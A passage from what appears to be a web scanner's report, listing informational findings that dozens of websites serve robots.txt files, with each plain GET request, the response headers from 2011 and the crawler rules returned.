Disallow: /keyletter-
Disallow: /google.htm
Disallow: /country-2-LB.html
Disallow: /country-0-GU.h
...[SNIP]...

30.153. http://www.edeals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edeals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edeals.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:39 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Tue, 30 Nov 2010 16:16:31 GMT
ETag: "54f96-e09-4964782f855c0"
Accept-Ranges: bytes
Content-Length: 3593
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cadmin/
Disallow: /search/
Disallow: /auctions/
Disallow: /redeem/
Disallow: /mredeem/
Disallow: /credeem/
Disallow: /nredeem/
Disallow: /predeem/
Disallow: /psredeem
...[SNIP]...

30.154. http://www.eders.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eders.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 11 Aug 2009 21:08:11 GMT
ETag: "14294cec-e5d-470e41996a4c0"
Accept-Ranges: bytes
Content-Length: 3677
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: Googlebot
Disallow: /*printable=Y*
Disallow: /*js=*
Disallow: /*print_cat=*

User-agent: *
Disallow: /catalog/
Disallow: /cart.php
Disallow: /config.local.php
Disallow: /config.php
Disallo
...[SNIP]...

30.155. http://www.ehobbies.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehobbies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehobbies.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:16 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Mon, 02 May 2011 01:11:16 GMT
Last-Modified: Tue, 19 Apr 2011 09:47:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Content-Type: text/plain
RTSS: 1
Connection: close

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

30.156. http://www.elanaspantry.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elanaspantry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elanaspantry.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:29:44 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.elanaspantry.com/blog/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.elanaspantry.com/sitemap.xml.gz

30.157. http://www.encomer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.encomer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.encomer.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:42:13 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-bfgandki=2906D148EC18ABFB180C5BE3152B68B5; path=/
Last-Modified: Tue, 10 Aug 2010 06:57:46 GMT
Content-Length: 51

User-agent: *
Disallow: /cgi-bin/
Disallow: /deep/

30.158. http://www.ephotozine.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ephotozine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ephotozine.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:51:05 GMT
Server: Apache
Last-Modified: Tue, 12 Apr 2011 10:52:40 GMT
Accept-Ranges: bytes
Content-Length: 232
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 00:51:05 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /s_img/
Disallow: /ajax/
Disallow: /libs/ajax/
Disallow: /libs/javascript/
Disallow: /libs/php/
Disallow: /styles/
Disallow: /dev/
Disallow: /act_clickthrough.cfm*
Disallow: /c
...[SNIP]...

30.159. http://www.etimspayments.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etimspayments.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etimspayments.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Sun, 01 May 2011 23:42:04 GMT
Content-type: text/plain
Last-modified: Wed, 15 Aug 2007 19:01:58 GMT
Content-length: 26
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

30.160. http://www.excellence-resorts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.excellence-resorts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.excellence-resorts.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:02 GMT
Server: Apache
Last-Modified: Wed, 12 Jan 2011 15:03:46 GMT
ETag: "67811a1-2c-499a781f8d880"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /html
Allow: /


30.161. http://www.expatforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expatforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expatforum.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 29 Sep 2010 13:04:11 GMT
ETag: "128c703-1f4-4916598f8a8c0"
Accept-Ranges: bytes
Content-Length: 500
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /expats/calendar.php
Disallow: /expats/private.php
Disallow: /expats/newreply.php
Disallow: /expats/misc.php
Disallow: /expats/members/
Disallow: /expats/newthread.php
Disallo
...[SNIP]...

30.162. http://www.express.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.express.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.express.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:45 GMT
Server: Apache
Last-Modified: Wed, 22 Dec 2010 13:50:03 GMT
ETag: "6429b-44-4980007ac58c0"
Accept-Ranges: bytes
Content-Length: 68
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /comments/view/285302
Disallow: /myexpress/

30.163. http://www.ezboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezboard.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:42:01 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Wed, 11 Oct 2006 12:41:30 GMT
ETag: "272338-f7-41f885fcb1280"
Accept-Ranges: bytes
Content-Length: 247
Cache-Control: max-age=7776000
Expires: Sat, 30 Jul 2011 23:42:01 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from static3.yuku.com
X-Cache-Lookup: MISS from static3.yuku.com:80
Via: 1.0 static3.yuku.com:80 (squid/2.6.STABLE6)
Connection: close

User-Agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/

...[SNIP]...

30.164. http://www.ezisp.info/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezisp.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezisp.info

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:58 GMT
Server: Apache
Last-Modified: Thu, 12 Jan 2006 08:20:22 GMT
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stat.html

30.165. http://www.ezjoblistings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezjoblistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezjoblistings.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:43 GMT
Server: Apache
Last-Modified: Fri, 30 Jul 2010 18:41:52 GMT
ETag: "38a5cc8-19-48c9f345063d8"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

30.166. http://www.ezwebsitecounter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezwebsitecounter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezwebsitecounter.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:25 GMT
Server: Apache
Last-Modified: Sun, 10 Apr 2011 07:07:29 GMT
ETag: "d48536-26-4da15731"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /c.js
Allow: /

30.167. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.21.36
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

30.168. http://www.facepinch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facepinch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facepinch.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:18 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Sat, 25 Sep 2010 22:05:28 GMT
ETag: "6200f4-19-4911cb162da00"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

30.169. http://www.faithclipart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faithclipart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.faithclipart.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:06:05 GMT
Server: Apache
Last-Modified: Wed, 14 Mar 2007 23:04:56 GMT
ETag: "9c13b2-2b-42bab08ed1600"
Accept-Ranges: bytes
Content-Length: 43
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

30.170. http://www.famegame.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.famegame.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.famegame.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Jan 2010 15:26:45 GMT
ETag: "1800009d-402-47c80950a9740"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1026
Date: Mon, 02 May 2011 00:50:13 GMT
X-Varnish: 693068348
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

User-agent: *
Disallow: /mediaObjectEdit/
Disallow: /mediaObjectInfoSave/
Disallow: /mediaObjectInfoSaveEP/
Disallow: /mediaObjectConSave/
Disallow: /mediaUpload/
Disallow: /mediaUploadEP/
Disallow: /
...[SNIP]...

30.171. http://www.fashionbombdaily.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fashionbombdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fashionbombdaily.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://fashionbombdaily.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

30.172. http://www.febreze.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.febreze.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.febreze.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:54 GMT
Server: Apache
Last-Modified: Fri, 04 Dec 2009 07:27:57 GMT
ETag: "78f56-9f-479e20bf4b940"
Accept-Ranges: bytes
Content-Length: 159
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#Allow entire Febreze site

User-agent: *
Disallow:/*/swfs/
Disallow:/*/images/
Disallow:/*ipdetection.do

#Disallow all session urls
Disallow:/*/*;jsessionid

30.173. http://www.fedstats.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedstats.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fedstats.gov

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:07 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2007 19:16:49 GMT
ETag: "1720096-22-42e90293eea40"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

30.174. http://www.feedagg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedagg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.feedagg.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
Last-Modified: Sun, 01 May 2011 00:08:31 GMT
ETag: "9ac8065-96-4a22bb502ddc0"
Accept-Ranges: bytes
Content-Length: 150
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /    

User-agent: *
Disallow: /add_lens.php
Disallow: /results?
Disallow: /search?cx=
Disallow: /login.php
Disallow: /jail.php

30.175. http://www.fenomen-games.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fenomen-games.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fenomen-games.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:25:35 GMT
Content-Type: text/plain
Content-Length: 305
Last-Modified: Thu, 20 Mar 2008 10:08:45 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Sitemap: http://www.fenomen-games.com/sitemap.xml
Disallow: /favicon.ico
Disallow: /cgi-bin/
Disallow: /style2.css
Disallow: /style.css
Disallow: /files/
Disallow: /dfiles/
Disallow: /do
...[SNIP]...

30.176. http://www.fibromyalgia-symptoms.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fibromyalgia-symptoms.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fibromyalgia-symptoms.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:53:38 GMT
Server: Apache/1.3.39 (Unix)
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /nts/

30.177. http://www.final4ever.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.final4ever.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.final4ever.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 10 Jan 2011 18:25:15 GMT
ETag: "2c7f98-9c4-4998216d998c0"
Accept-Ranges: bytes
Content-Length: 2500
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /member.php
Disallow: /ajax.php
Disallow: /attachment.php
Disallow: /calendar.php
Disallow: /converse.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /global.php
Disa
...[SNIP]...

30.178. http://www.firstload.de/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstload.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstload.de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:52 GMT
Server: Apache
Last-Modified: Tue, 28 Sep 2010 12:35:12 GMT
ETag: "88542-43-49151137a4000"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
#Disallow: /member/
#Disallow: /affiliate/


30.179. http://www.firstpeople.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstpeople.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstpeople.us

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 22 Aug 2009 22:59:57 GMT
ETag: "14006d-61-471c2f18d3540"
Accept-Ranges: bytes
Content-Length: 97
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.firstpeople.us
User-agent: *
Disallow:
Disallow: /cgi-bin/

30.180. http://www.flushotsusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flushotsusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flushotsusa.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Feb 2010 20:26:50 GMT
ETag: "35082de-a7-47eb809c79680"
Accept-Ranges: bytes
Content-Length: 167
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: http://www.flushotsusa.com/overview/C160/
Disallow: http://www.flushotsusa.com/category/C161/
Disallow: http://www.flushotsusa.com/detail/C161/

30.181. http://www.foot-pain-explained.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foot-pain-explained.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foot-pain-explained.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:22 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.foot-pain-explained.com/KBms0mcj.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /
...[SNIP]...

30.182. http://www.forrabbits.eu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forrabbits.eu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forrabbits.eu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:41:46 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 07:04:45 GMT
ETag: "3105a-88-490bfa4d05eba"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

30.183. http://www.fredflare.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredflare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fredflare.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:52 GMT
Server: Apache
Last-Modified: Tue, 31 Mar 2009 21:29:19 GMT
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /diary/kdiary.php

30.184. http://www.freegamesnews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freegamesnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freegamesnews.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:01 GMT
Server: Apache
Last-Modified: Fri, 01 Jun 2007 12:37:31 GMT
ETag: "3a-431d77a9298c0"
Accept-Ranges: bytes
Content-Length: 58
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Mon, 02 May 2011 01:44:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /fr/?feed=
Disallow: /en/?feed=


30.185. http://www.freei.me/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freei.me
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freei.me

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:38:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://freei.me/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from sv38.byethost38.org
Via: 1.0 sv38.byethost38.org:80 (squid/2.7.STABLE9)
Connection: close

User-agent: *
Disallow:

30.186. http://www.freemooviesonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemooviesonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Sat, 26 Jun 2010 18:05:12 GMT
ETag: "248001a-326-489f2ba910600"
Accept-Ranges: bytes
Content-Length: 806
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

30.187. http://www.ftjcfx.com/image-4989411-10867633

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftjcfx.com
Path:   /image-4989411-10867633

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftjcfx.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:19:28 GMT

# go away
User-agent: *
Disallow: /

30.188. http://www.fulltiltpoker.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulltiltpoker.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fulltiltpoker.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:46 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /?
Disallow: /download.php?aff=
Disallow: /download.php?key=
Disallow: /bonusMacBeta.php?aff
Disallow: /bonusMacBeta.php?key

User-agent: Slurp
Disallow: /?key=
Disallo
...[SNIP]...

30.189. http://www.gaf.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gaf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gaf.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 04 Oct 2010 18:14:00 GMT
Accept-Ranges: bytes
ETag: "024eeeaef63cb1:0"
Server: Microsoft-IIS/7.5
Content-Length: 301
Date: Sun, 01 May 2011 23:10:14 GMT
Connection: close

# robots.txt for http://www.gaf.com

User-Agent: *
Disallow: /App_Code
Disallow: /Bin
Disallow: /CCZ-HomePage
Disallow: /Controls
Disallow: /CustomErrors
Disallow: /homedepot
Disallow: /MasterPages
Di
...[SNIP]...

30.190. http://www.garden.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.garden.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.garden.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:32:41 GMT
Server: Apache/1.3.32 (Unix) PHP/5.0.3 mod_ssl/2.8.21 OpenSSL/0.9.7d
Last-Modified: Tue, 18 May 2010 14:04:22 GMT
ETag: "24385e-38-4bf29e66"
Accept-Ranges: bytes
Content-Length: 56
Content-Type: text/plain;charset=utf-8
Connection: close

User-agent: *
Disallow: info.php
Disallow: redirect.php

30.191. http://www.gastongazette.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gastongazette.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gastongazette.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:21 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Sun, 01 May 2011 20:05:54 GMT
Expires: Mon, 02 May 2011 20:05:54 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 928
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...

30.192. http://www.gearfuse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gearfuse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gearfuse.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:19:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.gearfuse.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: User-Agent,Accept-Encoding
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.gearfuse.com/sitemap.xml.gz

30.193. http://www.giantblackhooters.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giantblackhooters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giantblackhooters.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:01 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://giantblackhooters.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://giantblackhooters.com/sitemap.xml.gz

30.194. http://www.girlscoutshop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlscoutshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.girlscoutshop.com

Response

HTTP/1.1 200 OK
Content-Length: 94
Content-Type: text/plain
Last-Modified: Thu, 27 Jan 2011 23:17:19 GMT
Accept-Ranges: bytes
ETag: "dee0195878becb1:33ac"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:12:19 GMT
